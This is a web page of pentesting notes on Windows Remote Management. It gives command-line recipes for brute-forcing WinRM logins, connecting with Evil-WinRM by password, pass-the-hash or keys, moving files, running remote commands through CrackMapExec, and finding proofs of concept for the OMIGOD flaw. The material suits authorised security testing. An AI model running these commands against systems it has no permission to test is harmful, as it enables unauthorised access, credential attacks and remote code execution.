WinRM (Windows Remote Management) Pentesting

The Microsoft implementation of WS-Management Protocol which provides a common way for systems to access and exchange management information across an IT infrastructure. Default ports are 5985 (HTTP),

Enumeration

Brute Force Credentials

# CrackMapExec
poetry run crackmapexec winrm <target-ip> -d DomainName -u usernames.txt -p passwords.txt

# Metasploit
msfconsole
msf > use auxiliary/scanner/winrm/winrm_login
Copied!

Evil-WinRM

Evil-WinRM is a Windows Remote Management shell for pentesting. Below are list of commands for each situation.

Connect

evil-winrm -i <target-ip> -u username -p password
# -P: Specifify port
evil-winrm -i <target-ip> -P 5986 -u username -p password

# Pass The Hash (-H)
evil-winrm -i <target-ip> -P 5986 -u username -H 0e0363213e37b94221497260b0bcb4fc

# PowerShell Local Path (-s)
evil-winrm -i <target-ip> -u username -p password -s /opt/scripts

# SSL enabled (-S)
evil-winrm -i <target-ip> -u username -p password -S
Copied!

If you have private key and public key, you can use them for authentication.

# -S: SSL
# -k: private key
# -c: public key
evil-winrm -i <target-ip> -S -k private.key -c public.key
Copied!

Commands

After connecting, we can use a lot of useful commands to exploit. Note that we need to specify the absolute path for uploading and downloading.

# Upload a local file to Windows machine
PS> upload ./example.bat c:\\Users\Administrator\Desktop\exploit.bat
# Download a file to local
PS> download c:\\Users\Administrator\Desktop\example.txt ./example.txt

# List all services
PS> services
Copied!

CrackMapExec

CrackMapExec is a swiss army knife for pentesting networks. The official docs says that it's recommended to use it via Poetry which is a Python package manager.

First off, move to the directory in which the CrackMapExec installed and run poetry install.

cd crackmapexec
poetry install
Copied!

Then execute with poetry run.

# Login and CMD execution (-x)
poetry run crackmapexec winrm <target-ip> -d DomainName -u username -p password -x 'whoami'
# Login and PowerShell execution (-X)
poetry run crackmapexec winrm <target-ip> -d DomainName -u username -p password -X '$PSVersionTable'

# Pass the Hash and CMD execution (-x)
poetry run crackmapexec winrm <target-ip> -d DomainName -u username -H <HASH> -x 'whoami'
# Pass the Hash and PowerShell execution (-X)
poetry run crackmapexec winrm <target-ip> -d DomainName -u username -H <HASH> -X '$PSVersionTable'
Copied!

OMIGOD (CVE-2021-38647)

Open Management Infrastructure (OMI) is vulnerable to Remote Code Execution (RCE).

There are many PoC available, for instance:

• https://github.com/AlteredSecurity/CVE-2021-38647

• https://github.com/horizon3ai/CVE-2021-38647

References

• https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647

Tools by HDKS

Fuzzagotchi

Automatic web fuzzer.

aut0rec0n

Auto reconnaissance CLI.

Hash Cracker

Hash identifier.

DisclaimerPrivacy Policy